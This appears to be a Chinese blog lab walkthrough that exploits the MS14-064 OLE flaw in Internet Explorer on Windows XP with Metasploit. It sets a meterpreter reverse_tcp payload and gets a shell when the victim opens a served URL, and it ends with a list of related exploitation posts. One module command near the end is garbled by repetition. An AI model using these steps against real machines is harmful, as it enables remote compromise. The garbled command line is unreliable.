实验环境:kali linux、windows XP Professional SP3.

实验工具:metasploit framework

功能实现模块:use exploit/windows/brower/ms14_064_ole_code_execution

实验过程:

1.执行模块,查看参数配置,并且设置payload(set payload windows/meterpreter/reverse_tcp):

2.其他参数无需再配置,直接run就行。(如果端口LPORT被占用了,可以用set重新设置)

3.运行结果返回了一个url地址:http://192.168.1.24:8080/.在XP ie浏览器中执行该url地址:

成功获取shell

4.利用shell:

uuse exploit/windows/browser/ms14_064_ole_code_execution
use exploit/windows/browser/ms14_064_ole_code_executionse exploit/windows/browser/ms14_064_ole_code_execution

利用XP ie浏览器的漏洞获取shell相关推荐

  1. Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权

    Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...

  2. linux栈溢出漏洞,PWN简单栈溢出漏洞获取shell | kTWO-个人博客

    摘要 本文讲述的是PWN中利用溢出漏洞来执行shell命令的方法教程,本文将以简单的小程序来作为演示,从分析程序到编写payload加以利用,其中还含有二进制程序的保护机制简介. 0x01 前言 经过 ...

  3. 利用WiFi Pineapple Nano渗透客户端获取SHELL

    前言: 前两篇文章介绍了The WiFi Pineapple Nano设备的一些主要功能模块,例如PineAP.SSLsplit和Ettercap等.今天给大家实际场景演示下如何利用Pineapple ...

  4. 网络安全kali之利用宏感染word文档获取shell

    首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office. ┌──(root

  5. 【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF

    目录 1 案例简介 1.1 案例目的 1.2 案例环境 2 案例一:浏览器劫持 2.1 概述 2.2 案例步骤 3 案例二:会话劫持 3.1 概述 3.2 案例步骤 4 案例三:GetShell 4. ...

  6. Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限

    Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...

  7. 【XSS漏洞07】基于神器beEF的XSS漏洞利用实验(浏览器劫持、会话劫持、GetShell)

    目录 1 实验简介 1.1 实验目的 1.2 实验环境 2 实验一:浏览器劫持 2.1 概述 2.2 实验步骤 3 实验二:会话劫持 3.1 概述 3.2 实验步骤 4 实验三:GetShell 4. ...

  8. 利用新云网站管理系统漏洞成功获取某大型书店Webshell

    利用新云网站管理系统漏洞成功获取某大型书店Webshell 声明:本文仅做安全技术研究,请勿用来做违法事! 通过本文可以学到: ①了解新云网站管理系统 ②利用新云网站管理系统存在的SQL注入漏洞.文件 ...

  9. 一则利用内核漏洞获取root权限的案例【转】

    转自:https://blog.csdn.net/u014089131/article/details/73933649 目录(?)[-] 漏洞描述 漏洞的影响范围 漏洞曝光时间 漏洞产生的原因 漏洞 ...

最新文章

  1. Python数据分析,抓取京东商品价格
  2. 2.1 Java程序的构成
  3. 第二天——hibernate讲完了
  4. LayaAir-图集动画
  5. [转] Agile Software Development 敏捷软件开发
  6. Java调用python的程序
  7. 基于宽表的数据建模应用
  8. 【入门级】Hibernate环境搭建
  9. 关于大数据技术原理与应用的学习(6)
  10. 关于C++、C#实现EXCEL数据库批量导入数据库万行以上数据效率问题
  11. 【粒子动画tsParticles】
  12. java求亲密数,怎么写更好更快?
  13. 史上最小白之BM25详解与实现
  14. 基于目标检测的海上舰船图像超分辨率研究
  15. 信息学奥赛一本通 1081:分苹果 | OpenJudge NOI 小学奥数 7826:分苹果
  16. 图片尺寸太小,怎样无损放大?
  17. java xfire 客户端代码_java调用xfire webService服务客户端代码
  18. 最经典的电脑病毒,适合练手,大家一定要增强安全防范意识
  19. 西铁城手表最外圈数字是什么,【西铁城 Eco-Drive CB0160-51L 男士光动能腕表开箱晒物】表盘|外圈|表冠|按钮|机芯_摘要频道_什么值得买...
  20. 辩驳一个默认的说法:IE6不支持!important

热门文章

  1. Jquery结合Ctrl和Shift键,快速多选与反选
  2. tp886n设置虚拟服务器,TP-Link TL-WR886N V4-V5设置虚拟服务器方法
  3. 展讯平台功耗调试记录
  4. Paypal 测试账号注册的过程
  5. Ubuntu20.04下安装CUDNN
  6. cpu针脚测试软件,CPU针脚歪竟然也能开机?_机箱电源评测-中关村在线
  7. 2020年 ICPC 亚洲区域赛(上海)G-Fibonacci
  8. 跨考机械类好还是计算机类好,考研,从机械专业“跨考”材料专业,靠谱吗?...
  9. MAC电脑Command键调换为Control键的方法
  10. UG NX 12 曲面的偏置